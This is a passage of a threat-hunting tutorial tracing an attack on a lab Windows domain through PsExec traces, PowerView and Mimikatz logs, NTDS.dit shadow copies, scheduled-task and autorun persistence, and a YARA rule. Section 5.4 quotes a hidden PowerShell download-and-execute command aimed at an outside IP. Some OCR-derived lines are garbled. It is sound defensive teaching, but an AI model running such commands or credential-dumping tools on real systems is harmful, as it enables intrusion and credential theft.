PS C:\Python27> .\python.exe C:\Users\Ahmed\Desktop\ShimCacheParser-master\ShimCacheParser.py -i C:\Users\Ahmed\Desktop\SYSTEM
[+] Reading registry hive: C:\Users\Hhmed\Desktop\SYSTEH
[+] Found 64bit Windows 7/2k8-R2 Shim Cache data
[+] Found 64bit Windows 7/2k8-R2 Shim Cache data
Last Modified Last Update Path File Size Exec Flag
11/21/10 03:24:09 N/Ā C:\Windows\system32\LogonUI.exe N/A True
07/14/09 01:39:37 N/A C:\Windows\system32\SearchFilterHost.exe N/A True
07/14/09 01:39:37 N/A C:\Windows\system32\SearchProtocolHost.exe N/A True
07/14/09 01:39:06 N/A C:\Windows\system32\DllHost.exe N/A True
11/21/10 03:23:55 N/A C:\Windows\System32\cmd.exe N/A True
03/07/20 18:06:49 N/A C:\Windows\PSEXESUC.exe N/A True
11/21/10 03:24:08 N/A C:\Windows\system32\consent.exe N/A True
11/21/10 03:23:48 N/A C:\Windows\System32\fontext.dll N/A False
11/21/10 03:23:48 N/A C:\Windows\System32\mscoree.dll N/A False
11/21/10 03:23:54 N/A C:\Windows\Svstem32\shdocvw.dll N/A False
11/21/10 03:24:52 N/A C:\Windows\System32\wpdshext.dll N/A False
11/21/10 03:24:02 N/A C:\Windows\System32\networkexplorer.dll N/A False
11/21/10 03:23:51 N/A C:\Windows\Svstem32\ntshrui.dll N/A False
11/21/10 03:24:41 N/A C:\Windows\System32\cscui.dll N/A False
07/14/09 01:40:36 N/A C:\Windows\Svstem32\EhStorShell.dll N/A False

Figure 15. Shimcache Results.

PS C:\Python27> .\python.exe C:\Users\Ahmed\Desktop\Shim	CacheParser-master\ShimCacheParser.py -i C:\Users\Ahmed\Desktop\SYSTEM S	elect-String "psexesvc"
PS C:\Python27> .\python.exe C:\Users\Ahmed\Desktop\Shim 03/07/20 18:06:49 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:39:49 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:39:49 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:39:49 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:32:43 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:24:48 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 16:54:48 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 15:57:45 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 15:57:45 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 15:57:45 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 15:57:41 N/A C:\Windows\PSEXESUC.exe N/A True 03/07/20 15:51:21 N/A C:\Windows\PSEXESUC.exe N/A True	CacheParser-master\ShimCacheParser.py -i C:\Users\Ahmed\Desktop\SYSTEM ; S	elect-String "psexesuc"
03/07/20 15:52:50 N/H C: Windows YESKESUC.exe N/A True 03/07/20 15:51:42 N/A C: Windows YESKESUC.exe N/A True 03/05/20 17:42:14 N/A C: Windows YESKESUC.exe N/A True 03/03/20 17:42:14 N/A C: Windows YESKESUC.exe N/A True 03/03/20 17:42:14 N/A C: Windows YESKESUC.exe N/A False 03/03/20 17:42:14 N/A C: Windows YESKESUC.exe N/A False 03/03/20 17:25:20 N/A C: Windows YESKESUC.exe N/A False 03/03/20 15:56:15 N/A C: Windows YESKESUC.exe N/A False		

Figure 16. Shimcache Results for PSEXESVC.

You can see on the above figures that we used a Shimcache parser tool to extract the cache information from the registry hive (SYSTEM). The results are a quite number of tools and files that whether has an execution flag or not. In our case, the Psexec tool is indeed has been executed and the execution flag is set to (true).

5.2 PowerShell Suspicious Commands

PowerShell is very known to the attackers and the red teamers. They often use PowerShell to achieve their goals and make the job easier. There are common PowerShell scripts that can be used for enumeration, privilege escalation and persistence. In this scenario, we will demonstrate that an attacker has used some suspicious PowerShell scripts and executed malicious commands to achieve the attacker's goal in the network.

As a threat hunter, we have to always check the PowerShell events in order to detect any kind of malicious or suspicious commands:

Event 60	00, Pov	werShell (PowerShell)				×
Gener	al De	etails				
_						
Prov	vider "	'Environment" is Started.				
Deta	ails:					
	P	ProviderName=Environm	ent			
	N	NewProviderState=Started	1			
	S	SequenceNumber=5				
		HortName=ConcoleHort				
	÷	HostVersion=5.1.15063.13	87			
	Ŀ	HostId=319fa11b-a1ba-46	35-b8b4-88493d	48db13		
	Ļ	HostApplication=C:\Wind	lows\System32\\	WindowsPow	erShell\v1.0\powershell.exe -ExecutionPolicy bypass	
	R	Runspaceld=				
	P	Pipelineld=				
	0	CommandName=				
	s	ScriptName=				
	0	CommandPath=				
	C	CommandLine=				
Log	Name:	: Windows Powe	rShell			
Source	ce:	PowerShell (Pov	werShell) Lo	ogged:	4/10/2020 8:09:01 PM	
Event	t ID:	600	Ta	ask Category:	Provider Lifecycle	
Level	l:	Information	Ke	eywords:	Classic	
User:		N/A	Ci	omputer:	PC-02.Haboob.local	

Figure 17. PowerShell Event ID (600).

I	vent 4104, PowerShell (Microsoft-Windows-PowerShell)	×
	General Details	
	Creating Scriptblock text (1 of 1): powershell -ExecutionPolicy bypass ScriptBlock ID: ac53ba1a-5a17-49a6-9f60-fa9d3d19df58 Path:	

Figure 18. Microsoft-Windows-PowerShell Event ID (4104).

In the above events, we see that some users have bypassed the execution policy of the PowerShell. This activity is usually done by malicious users to allow them for running such scripts which by default the policy is set to "Restricted". Therefore, it prevents the execution of PowerShell scripts. The events that triggered this activity can be found on (PowerShell events "Figure 17") and (Microsoft-Windows-PowerShell events "Figure 18").

After going through the events, we have observed the below suspicious event:

Eve	nt 4104, PowerShel	I (Microsoft-Windows-PowerS	ihell)			
G	eneral Details					
	Creating Scriptblo	ck text (1 of 31):			^	
	#requires -version	2				
	<#					
	PowerSploit File	: PowerView.ps1				
	Author: Will Sch	roeder (@harmj0y)				
	Required Depen	dencies: None				
	Optional Depend	dencies: None				
	#>					
	#					
	# PSReflect code fe # Author: @mattif	or Windows API access estation				
	# https://raw.gith	ubusercontent.com/mattifest	ation/PSReflect/	(master/PSReflect.psm1		
	# ##################	*********************	*********	*****		
	function New-InM {	lemoryModule			~	
L	.og Name:	Microsoft-Windows-PowerSł	nell/Operational			
5	Source:	PowerShell (Microsoft-Wind	Logged:	4/10/2020 9:42:34 PM		
E	vent ID:	4104	Task Category:	Execute a Remote Command		
L	.evel:	Warning	Keywords:	None		
l	Jser:	HABOOB\Rayan	Computer:	PC-02.Haboob.local		

Figure 19. Suspicious Script 1 - Microsoft-Windows-PowerShell Event ID (4104).

Event 4104, PowerShell (Micro	soft-Windows-PowerShel	ll)				
General Details						
Creating Scriptblock text (ounts' or 'ssn' in the name, and .LINK <u>http://www.harmj0y.</u>	26 of 31): write everything to "out.o net/blog/redteaming/file-	.csv" -server-triage-	on-red-team-engagements/			
[CmdletBinding()] param([Parameter(Position= [Alias('Hosts')] [String[]] SComputerName, [ValidateScript([Test- [Alias('HostList')] [String] SComputerFile, [String] SComputerFilter	0,ValueFromPipeline=\$Tri Path -Path \$_ }}]	rue)]				
Log Name: Micros Source: Power	Log Name: Microsoft-Windows-PowerShell/Operational Source: PowerShell (Microsoft-Wind Logged: 4/10/2020 9:42:34 PM					
Event ID: 4104	Ta	ask Category:	Execute a Remote Command			
Level: Warning Keywords: N		None				
User: HABO	DB\Rayan Co	omputer:	PC-02.Haboob.local			

Figure 20. Suspicious Script 2 - Microsoft-Windows-PowerShell Event ID (4104).

We can see that a malicious script has been executed on the target machine (PC-02). The script is PowerView which is a famous PowerShell module that its main goal to enumerate the target domain (like enumerating domain users, groups, computers, GPOs, ACLs).

Another suspicious event has been logged as shown in figure 21:

Event 4104, PowerShe	ll (Microsoft-Windows-Power	Shell)					
General Details							
Creating Scriptblo function Invoke-N { <# .SYNOPSIS	ock text (1 of 220): /limikatz			^			
This script leverag dump credentials	jes Mimikatz 2.0 and Invoke-Re without ever writing the mimi	eflectivePEInjecti katz binary to dis	ion to reflectively load Mimikatz completely in memory. This allows you to do things such as sk.				
This script should	The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.						
Function: Invoke- Author: Joe Bialek	<mark>Mimikatz</mark> , Twitter: @JosephBialek	N					
License: http://cr	eativecommons.org/licenses/l	by/3.0/fr/	<u>.gentlikiwi.com</u> . Email: benjamin@gentlikiwi.com. Twitter @gentlikiwi				
Required Depende Optional Depende	encies <mark>: Mimikatz (included)</mark> encies: None						
Mimikatz version:	2.0 alpha (12/14/2015)						
.DESCRIPTION				~			
, Log Name:	Microsoft-Windows-PowerS	hell/Operational					
Source:	PowerShell (Microsoft-Wind	Logged:	4/10/2020 8:09:20 PM				
Event ID:	4104	Task Category:	Execute a Remote Command				
Level:	Warning	Keywords:	None				
User:	HABOOB\Rayan	Computer:	PC-02.Haboob.local				

Figure 21. Suspicious Script 3 - Microsoft-Windows-PowerShell Event ID (4104).

This time we have detected the Mimikatz PowerShell script from Benjamin (the author of this tool). It's clearly that the attacker has first enumerated the machine with PowerView then downloaded the Mimikatz and dumped the passwords of the logged in users from memory.

There is another great source for the PowerShell history commands which is a file called (ConsoleHost_history.txt). The file records all the commands typed by any user in the PowerShell terminal. By default, it will save all the typed commands (starting from PowerShell V5 on Windows 10). Actually, this is a good forensic artifact in which we can hunt for malicious commands of any suspected compromised user (or se it proactively for hunting). See the figure 22 for the location of the file.

🖉 📙 🚽		:	Search Tools	PSReadline				
File Home	Share	View	Search					
← → • ↑ <mark> </mark>	Ray	∕an → AppDa	ita > Roaming	y → Microsoft →	Windows > PowerShell	> PSReadline		ٽ ~
	_	Name	^		Date modified	Туре	Size	
A Quick access		Consol	eHost_history.b	xt	4/10/2020 8:31 PM	Text Document	4 KB	
Desktop	Å							
🕂 Downloads	*							
🔮 Documents	*							
Pictures	*							
👌 Music								
Videos								
len OneDrive								

Figure 22. PowerShell History File Location.

After opening the file, we can see all the commands that have been typed as shown below:



Figure 23. The Content of the PowerShell History File.

We can confirm that the whole target domain is compromised from the above commands (Figure 23). Basically, the attacker or the red teamer has used the malicious scripts as we explained before (PowerView.ps1 and Mimikatz.ps1). Then, he dumped the passwords of another computer (PC-01) from the memory by using the (Invoke-Mimikatz). After that, he enumerated the Domain Controllers of the current domain (Haboob.local). Then, he connected to the DC-01 using a Domain Admin credentials (Ali) with the PowerShell Remoting (PSSession). Moreover, we can confirm this activity by checking the Windows security events:

Event 4648, Microsoft Windows secur	ty auditing.
General Details	
A logon was attempted using exp	icit credentials.
Cubinet	
Subject:	HAROORY
Account Name	Pavan Pavan
Account Domain	HAROOR
Logon ID:	0x30154
Logon GUID:	{00000000-0000-0000-000000000000}
Account Whose Credentials Were	licert
Account Name:	ali
Account Domain:	HABOOBLOCAL
Logon GUID:	{00000000-0000-0000-0000000000000}}
Target Server:	
Target Server Name:	DC-01
Additional Information:	HTTP/DC-01
Process Information:	
Process ID:	0x1f64
Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Figure 24. Attacker Successfully Connected to DC - Windows Security Event ID (4648).

5.3 Dumping NTDS.dit File

NTDS.dit file is a database of the Active Directory that stores all the information about user accounts, groups, password hashes. Whenever an attacker or a red teamer has Domain Admin privileges (as demonstrated on the previous scenario) and connects to the Domain Controller (DC), he usually collects the NTDS.dit file from the DC in order to dump the file and extract all the password hashes of all the domain users including the high privilege accounts (such as Domain Admins) and then he can crack the passwords offline to get clear text passwords.

This activity (stealing the NTDS.dit file from DC) is usually done by using the vssadmin utility from Windows which will enable the creation of shadow copies for any drive (C drive in our case). This will allow the attacker to copy any file on the disk even if the file is running and cannot be copied in a normal case (such as NTDS.dit file which cannot be copied). Below is the command to create a shadow copy for C drive and copy the NTDS.dit file:



Figure 25. Vssadmin Command and Copy NTDS.dit.

We can detect this activity from the Windows events (system events) with the ID (7036):

Ev	Event 7036, Service Control Manager							
	General Details							
	The Microsoft Software Shadow Copy Provider service entered the stopped state.							

Figure 26. Shadow Copy Event – System Event ID (7036).

After investigating the security events, we found another event for using the vssadmin utility:

Eve	ent 4904, Microsoft Windows security auditing.
G	jeneral Details
	An attempt was made to register a security event source.
	Subject : Security ID: SYSTEM Account Name: DC-01S Account Domain: HABOOB Logon ID: 0x3E7
	Process: Process ID: 0xacc Process Name: C:\Windows\System32\VSSVC.exe Event Source:
	Event Source. VSSAudit Event Source ID: 0xC4A35

Figure 27. Vssadmin Process - Security Event ID (4904).

Also, this activity has been triggered in the Windows event (application event):

Event 13, VSS
General Details
Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.

Figure 28. VSS Shadow Copy - Application Event ID (13).

There is a great artifact for which you can observe and detect any shadow copy has been created on the Domain Controller. This artifact can be found in the registry and you can know how many shadow copies have been created:



Figure 29. Registry Value for Shadow Copies Information.

In figure 29, you can see that there are two registry keys for the two shadow copies that have been created. As a threat hunter, you have to not rely only on the windows event for detecting this kind of activities, in fact, you have to investigate all the artifacts on the machine as well as guessing what an attacker can do in a critical server like the DC? Asking yourself such questions will help you to speed up the investigation.

5.4 Persistence with Schedule Task

Whenever an attacker of a red teamer has compromised a machine or has a full control over the domain, he usually creates a persistence way on the machine. Some of the persistence techniques used by the red teamers are the schedule tasks. A schedule task can be created to make a program or an executable file running in a period of time (like every day, every week, or at a specific time).

We will check the Windows event (schedule task events) to see if there is any abnormal schedule task has been created:

E	vent 106, TaskSche	event 106, TaskScheduler								
	General Details									
User "S-1-5-18" registered Task Scheduler task "\update_software"										
	Log Name:	Microsoft-Windows-1	askScheduler/Operation	nal						
	Source:	TaskScheduler	Logged:	4/14/2020 6:12:31 AM						
	Event ID:	106	Task Category:	Task registered						
	Level:	Information	Keywords:							
	User:	SYSTEM	Computer:	PC-02.Haboob.local						

Figure 30. "update_software" Task Schedule - TaskScheduler Event ID (106).

Eve	Event 100, TaskScheduler									
General Details										
	Task So	ste_software" task for user <mark>"NT AUTHORITY\SYSTEM".</mark>								
1	Log Nar	me: Mi	crosoft-Windows-TaskSch	eduler/Operatior	nal					
1	Source:	Tas	skScheduler	Logged:	4/14/2020 6:39:56 AM					
	Event ID	: 100	D	Task Category:	Task Started					
	Level:	Inf	ormation	Keywords:	(1)					
	User:	SY	STEM	Computer:	PC-02.Haboob.local					

Figure 31. "update_software" Task Schedule - TaskScheduler Event ID (100).

The above events from the TaskScheduler events type show that there is a task schedule has been created by NT AUTHORITY\SYSTEM with a task name (update_software). Although the name of the task schedule seems to be normal and not suspicious, but as a threat hunter we have to investigate more on this task and confirm whether the task is a normal or indeed it's a malicious task.

We will go to the location of all the tasks (C:\Windows\System32\Tasks) in order to find and open the task in question (update_software) and see its configuration:

<mark>,</mark> ≯ Th	is PC > Local Disk (C:) > Windows > System32 > Tasks		√ Č	
	Name	Date modified	Туре	Size
	update_software	4/14/2020 6:12 AM	File	4 KB
7	OneDrive Standalone Update Task-S-1-5-21-3583766964-1297818350-1736902504-1109	3/23/2020 3:27 PM	File	4 KB
Ŕ	📄 OneDrive Standalone Update Task v2	3/2/2020 2:03 PM	File	4 KB
*	📄 install agent	3/11/2020 11:46 AM	File	4 KB
1	Microsoft	3/3/2020 12:55 AM	File folder	

Figure 32. "update_software" Task File.

We opened the file (update_software) on the notepad to see the content of the task:



Figure 33. "update_software" File Content.

After checking the content of the file, we can find that the task is scheduled to execute a bat file called (update.bat) on C:\Windows\Temp.

We will go the location of the bat file (C:\Windows\Temp) to check if the bat file is still there:

NI	Determined (Cont		<u> </u>	
Name	Date modified	Туре	Size	
{940620E8-3EFF-4835-87AB-826D31BF353B}	4/14/2020 6:20 AM	File folder		
{15E1C1B1-54F9-4D44-9E84-E0779B004B33}	4/11/2020 3:33 AM	File folder	_	
💿 update.bat	4/14/2020 6:10 AM	Windows Batch File	1 KB	
vmware-vmusr.log	4/13/2020 4:36 AM	Text Document	37 KB	
vmware-vmsvc.log	4/14/2020 3:41 AM	Text Document	98 KB	
MpCmdRun.log	4/14/2020 4:04 AM	Text Document	6 KB	

Figure 34. "update.bat" File.

The file is indeed there, we opened the bat file to see its content:

🗐 update.bat - Notepad	-		×
File Edit Format View Help			
powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c "iex (New-Object Net.WebClient).DownloadString('https://172.97.69.79/h	run.p	5 <mark>1'</mark>)"	

Figure 35. "update.bat" File Content.

The content of the bat file is a PowerShell command which uses the Net.WebClient class to download a file called (run.ps1) from a suspicious IP. As a threat hunter, we will check the suspicious IP in VirusTotal to see if the IP is marked as a malicious on some AV engines:

5	() 5 engines detected this IP address		
7 81	172.97.69.79 (172.97.68.0/23) AS 26548 (Purevoltage Enterprises Inc.)		
Community Score			
DETECTION	DETAILS RELATIONS COMMUNITY		
CRDF	() Malicious	ESET	() Malware
Forcepoint Thre	eatSeeker () Malicious	Fortinet	() Malware
Kaspersky	() Malware	ADMINUSLabs	() Malware
AegisLab Web	Guard () Malicious	AlienVault	() Malware
BitDefender	① Malicious	Blueliv	() Malware

Figure 36. VirusTotal Results.

We can confirm that this is a malicious activity and the IP seems to be a server owned by an attacker which is being used to download and execute a malicious PowerShell script file (run.ps1) in a scheduled time.

5.5 Persistence with Autorun

As we explained the persistence way of the schedule task that is being used by the attackers and red teamer, there is another persistence way which also is being used quite often by the bad guys that is "Autorun". The Autorun can be used to configure a program or an executable file to run during system bootup or login. As a threat hunter, we will investigate the known registry keys for Autoruns, and one of the keys is (Run) key. After checking this key, we found a registry value that configured to be an autorun as shown in figure 37:



Figure 37. Explorer Export Autorun.

The name of the file as well as the path seem to be normal but remember that as a threat hunter we have to always investigate. We will go to the location of the file (ExExport.exe):

🚱 🔵 💌 🛄 🕨 Computer 🕨 Local Disk (C:) 🕨 Program Files (x86) 🔺 Internet Explorer 🕨								
Organize 🔻 🛛 Include i	n library 👻 Share with 🔻	New folder						
🔆 Favorites	Name	Date modified	Туре	Size				
🧮 Desktop	퉬 en-US	4/12/2011 11:17 AM	File folder					
〕 Downloads	SIGNUP	11/21/2010 6:31 AM	File folder					
🗐 Recent Places	💷 ExtExporrt 🗲	4/13/2020 3:38 AM	Application	73 KB				
	💷 ExtExport 🚽	11/21/2010 6:25 AM	Application	142 KB				
门 Libraries	🏉 ieinstal	11/21/2010 6:25 AM	Application	365 KB				
Documents	<i> ielowutil</i>	7/14/2009 4:14 AM	Application	113 KB				
🎝 Music	🏉 iexplore	11/21/2010 6:25 AM	Application	658 KB				
Pictures	🚳 hmmapi.dll	7/14/2009 4:15 AM	Application extens	50 KB				
😸 Videos	🚳 iecompat.dll	11/21/2010 6:25 AM	Application extens	8 KB				
	🚳 iedvtool.dll	11/21/2010 6:25 AM	Application extens	840 KB				
👰 Computer	🚳 ieproxy.dll	11/21/2010 6:25 AM	Application extens	160 KB				

Figure 38. "ExeExporrt" File Location.

In figure 38, We can observe that there are two files with almost the same name. We don't know which of them is a suspicious file and the other is a normal or a legitimate file.

ExtExporrt Prope	rties		ExtExport Proper	ties
General Compatibi	lity Security Details Previous Versions		General Compatibi	lity Security Details Previous Versions
Property	Value		Property	Value
Description -			Description -	
File description	ApacheBench command line utility		File description	Internet Explorer ImpExp FF exporter
Туре	Application		Туре	Application
File version	2.2.14.0		File version	8.0.7601.17514
Product name	Apache HTTP Server		Product name	Windows® Internet Explorer
Product version	2.2.14		Product version	8.00.7601.17514
Copyright	Copyright 2009 The Apache Software F		Copyright	Microsoft Corporation. All rights reserv
Size	72.0 KB		Size	142 KB
Date modified	4/13/2020 3:38 AM		Date modified	11/21/2010 6:25 AM
Language	English (United States)		Language	English (United States)
Original filename	ab.exe		Original filename	extexport.exe
Suspicious File			1	Normal File
Remove Properties and Personal Information			Remove Properties	s and Personal Information
	OK Cancel Apply			OK Cancel Apply

We analyzed the properties of the two files and compared them together:

Figure 39. Comparing the Two Files.

After comparing the two files, it's clearly that this file (ExtExporrt) is a suspicious file. The suspicious file has a product name "Apache HTTP Server" which could be an HTTP reverse shell. On the other hand, the normal file has a Microsoft signature. Also, the modified data of the suspicious file comparing to the normal file is a big difference which gives us a sign. We can also detect this activity by using the Sysinternals tool "autorun" from Microsoft:

Autoruns [HABOOB\Ali] - Sysint	ternals: www.sysinternals.com									
File Entry Options User He	lp									
🛃 🗈 🏦 🛃 🔀 🦻 Filter	:									
	Network Providers				🗐 wmi				.	Sidebar Ga
🖾 Everything 🛛 😹 Logon	🚼 Explorer 🛛 🥭 Internet Explorer	🔡 Sch	eduled Tasks	Services	Drivers	Codecs	Boo	ot Execute	📑 Image Hijacks	🚯 AppI
Autorun Entry	Description	Publisher			Image Path				Timestamp	
HKLM\SYSTEM\CurrentControlS	et\Control\SafeBoot\AlternateShell								7/14/2009 7:4	49 AM
🕼 📷 cmd.exe	Windows Command Processor	(Verified) Mid	crosoft Windows	5	c:\windows\s	system32\cmd.ex	œ		11/20/2010 1	2:46 PM
HKLM\SOFTWARE\Microsoft\W	/indows\CurrentVersion\Run								4/23/2020 1:1	10 AM
Explorer Export	ApacheBench command line utility	(Not verified) Apache Softwa	are Foundation	c:\program fil	es (x86)\internet	explorer\e	xtexport.exe	9/28/2009 10	:57 PM
VMware User Process	VMware Tools Core Service	(Verified) VN	Iware, Inc.		c:\program fil	es\vmware\vmw	are tools\	vmtoolsd.exe	2/20/2019 2:0	07 PM
HKLM\SOFTWARE\Microsoft\Ad	ctive Setup\Installed Components								3/3/2020 2:3	1 PM
🗹 🔯 Google Chrome	Google Chrome Installer	(Verified) Go	ogle LLC		c:\program fil	es (x86)\google\	chrome\a	pplication\81.0.4	404 4/14/2020 11	:26 PM
		A/ - 0 14	<u> </u>						0.00.0000.000	

Figure 40. Autorun Sysinternals.

We can easily detect the suspicious autoruns by looking for the "Not Verified" publisher. The malicious file has a "Not Verified" flag whether the rest have a "Verified" flag.

Now, we confirmed that this is a malicious file being used on the machine (PC-01) and could be an HTTP reverse shell that the attacker uses it to connect back from the victim machine each time the user logs in. Suppose that this malicious file is exist on another machine, and actually we don't know if the file indeed is existing on another machine or not. The attacker may use the same executable but with a different name and different location and maybe we don't find it on the autoruns or in the schedule tasks (as shown before). In this case, we could use the "Yara Rule" which is basically a way to create a rule for a specific file and then it looks for that file based on some strings/characters that you identify it. For this scenario, we extracted the strings of the malicious executable (ExtExporrt.exe) and then we created a simple Yara Rule that looks for some strings of the malicious file that we identified it:

```
    ExtExportt_Malware.yar - Notepad
Eile Edit Format View Help
rule ExtExportt_Malware {
    meta:
        description = "Sample Malware - ExtExportt.exe Malicious File"
        author = "Haboob Team"
        date = "13-04-2020"
    strings:
        $s1 = "C:\\local0\\asf\\release\\build-2.2.14\\support\\Release\\ab.pdb" fullword ascii
        $s2 = "-T content-type Content-type header for POSTing, eg." fullword ascii
        $s3 = "%I64d

        condition:
            (all of them) and (filesize < 100KB)
</td>
```

Figure 41. Yara Rule for (ExtExporrt.exe).

Then we ran the rule on the machine (PC-02) to look for those strings over all the files/folders:



Figure 42. Yara Rule Command.

We have actually found three malicious files with the same malicious executable that we previously found (ExtExporrt.exe). The new malicious files are found on multiple location on the machine (PC-02) with different names. You can note that one of them is on the Recycle Bin which it has been deleted.

For this purpose, we used this Yara Rule only on one machine, imagine if we are in a domain that has a lot of computers (such as more than 500 Domain-Joined Computers) and we run such a rule on those machine. Also, think about if we have an EDR that supports the use of Yara rule, with this way, we can run a Yara rule from the EDR management over all the agent-connected machines. With this way, we can save a lot of time for hunting and investigating.

Amcache Artifact:

Amcache is a great forensic artifact that is a must for any DFIR specialist to use it during the threat hunting and the investigation. The Amcache.hve file is a registry file that stores the information of executed applications. These executed applications include the execution path, first executed time, deleted time, and first installation.

We can use the tool AmCacheParser from Eric Zimmerman to analyze the Amcache results:

C:\Users\Rayan\Desktop>AmcacheParser.exe -f "C:\Windows\appcompat\Programs\Amcache.hve"csv C:\Users\Rayan\Desktop\ AmcacheParser version 1.3.3.0
Author: Eric Zimmerman (saericzimmerman@gmail.com) https://github.com/EricZimmerman/AmcacheParser
Command line: -f C:\Windows\appcompat\Programs\Amcache.hvecsv C:\Users\Rayan\Desktop\
'C:\Windows\appcompat\Programs\Amcache.hve' is in use. Rerouting
Two transaction logs found. Determining primary log Primary log: C:\Windows\appcompat\Programs\Amcache.hve.LOG1, secondary log: C:\Windows\appcompat\Programs\Amcache.hve.LOG2 Replaying log file: C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Replaying log file: C:\Windows\appcompat\Programs\Amcache.hve.LOG2 At least one transaction log was applied. Sequence numbers have been updated to 0x0105
'C:\Windows\appcompat\Programs\Amcache.hve' is in new format!
Total file entries found: 244 Total shortcuts found: 66 Total device containers found: 17 Total device PnPs found: 195 Total drive binaries found: 332 Total driver packages found: 9
Found 191 unassociated file entries
Results saved to: C:\Users\Rayan\Desktop\
Total parsing time: 0.729 seconds.



FileKeyLastWriteTimest SHA1	FullPath	Name	FileExtension	ProductName	Size
4/11/2020 0:38 44496e2be40ce4274fa540c0a93925ad2ff5cbe9	c:\windows\system32\compattelrunner.exe	CompatTelRunner.exe	.exe	microsoft® windows® operating system	144888
4/10/2020 1:47 427693e6b1831469ae0ea1d4067a792f3b05a720	c:\windows\system32\consent.exe	consent.exe	.exe	microsoft® windows® operating system	154528
4/10/2020 1:47 18b27889867249511e15f5a6b8700a106140f38f	c:\windows\system32\credentialuibroker.exe	CredentialUIBroker.exe	.exe	microsoft® windows® operating system	102312
3/8/2020 19:30 0aa9e72cb19ff809270e2b288ddc1da93da843b0	c:\windows\system32\csrss.exe	csrss.exe	.exe	microsoft® windows® operating system	17696
3/8/2020 19:08 5188b88c2911170ccc47bd462404fb3ece17a99c	c:\program files\cuassistant\culauncher.exe	culauncher.exe	.exe	microsoft® windows® operating system	369696
4/11/2020 0:38 52d35af657197bfad1d6a40fc278eae586d78ccf	c:\windows\system32\devicecensus.exe	DeviceCensus.exe	.exe	microsoft® windows® operating system	35128
3/8/2020 19:08 e2e5d4feb0dff20ad1d83f72062f5816d365bc37	c:\program files\rempl\disktoast.exe	disktoast.exe	.exe	microsoft® windows® operating system	92664
4/13/2020 0:42 389e8332a59f2ece14e7bcd0d9539681753ac967	c:\windows\system32\dllhost.exe	dllhost.exe	.exe	microsoft® windows® operating system	21408
4/10/2020 1:47 604523a6f1f81b07a5561a3f23124e9466ce0631	c:\windows\system32\dsregcmd.exe	dsregcmd.exe	.exe	microsoftÅ® windowsÅ® operating system	659968
3/9/2020 15:32 95b01ac93315ed22ee12fdeab0f2909bfabfd046	c:\windows\system32\dwm.exe	dwm.exe	.exe	microsoftÅ® windowsÅ® operating system	57344
4/10/2020 1:58 cf02bfe4610f2bc265191832b046b2dc8e588e77	c:\windows\system32\dxdiag.exe	dxdiag.exe	.exe	microsoftÅ® windowsÅ® operating system	352768
4/10/2020 1:47 45f9ee92250ee92a26172a4f1a546caec7da1bb1	c:\windows\explorer.exe	explorer.exe	.exe	microsoftÅ® windowsÅ® operating system	4848952
4/23/2020 1:33 77916471237a0c022f4098ef781961a3fcde5c76	c:\users\ali\desktop\install.exe	install.exe	.exe	apache http server	73802
3/8/2020 19:08 7a9a224feda2162531f2ca8a476249527b0f4930	c:\program files\rempl\sedlauncher.exe	sedlauncher.exe	.exe	microsoftÂ [®] windowsÂ [®] operating system	351032
3/8/2020 19:08 e48a127e5cb75ed4279a714df6ab8a7e695863e0	c:\program files\rempl\sedsvc.exe	sedsvc.exe	.exe	microsoft® windows® operating system	357680
4/11/2020 1:35 5cec5ea0e5f5a6ed7e4726fe39e50563a351c9c8	c:\windows\system32\sessionmsg.exe	sessionmsg.exe	.exe	microsoft® windows® operating system	74960
3/8/2020 19:11 fc478297c6ed61f51a49f0a6d0f49eeabce17166	c:\\$windows.~bt\sources\setuphost.exe	setuphost.exe	.exe	microsoft® windows® operating system	859960
4/10/2020 1:47 0c53eabe78a9acba25658af0367bf1729d8ae0e7	c:\windows\system32\sihclient.exe	SIHClient.exe	.exe	microsoft® windows® operating system	229888
4/13/2020 0:21 129f4f0257715715d50fd7b7129ce231771ae1ea	c:\windows\system32\snippingtool.exe	SnippingTool.exe	.exe	microsoft® windows® operating system	3162112
3/8/2020 19:12 fd9154ec5fed8b2ee3a71e95cf62601ac9296509	c:\windows\system32\svchost.exe	svchost.exe	.exe	microsoft® windows® operating system	47664
3/23/2020 12:38 e341c9b6961d4956e48e2b89933e7a8f22faadf5	c:\windows\system32\systempropertiesremote.exe	SystemPropertiesRemote.exe	.exe	microsoft® windows® operating system	83968
3/10/2020 18:31 11ee71f4ea933b8f2861ad33a368e2779f7febbd	c:\windows\system32\taskhostw.exe	taskhostw.exe	.exe	microsoft® windows® operating system	87392
4/13/2020 0:47 2213958a14babf11dc92a1463ac4641919b7b1c5	c:\windows\system32\taskmgr.exe	Taskmgr.exe	.exe	microsoft® windows® operating system	1200912
4/22/2020 23:01 77916471237a0c022f4098ef781961a3fcde5c76	c:\windows\temp\test.exe	test.exe	.exe	apache http server	73802
4/11/2020 1:36 1a19d84464d409ea3115e4afd58ffb80ee110eaf	c:\windows\system32\werfault.exe	WerFault.exe	.exe	microsoft® windows® operating system	319384
4/12/2020 17:29 e0645e43dc03a42c2510c400d2f7df382fd4987a	c:\users\rayan\desktop\winprefetchview.exe	WinPrefetchView.exe	.exe	winprefetchview	112224
4/11/2020 1:58 ce75b5e0d323fc55f0e2bb63584d625c29669896	c:\windows\system32\winsat.exe	WinSAT.exe	.exe	microsoft® windows® operating system	3365888
3/8/2020 19:30 0aa9e72cb19ff809270e2b288ddc1da93da843b0	c:\windows\system32\csrss.exe	csrss.exe	.exe	microsoft® windows® operating system	17696
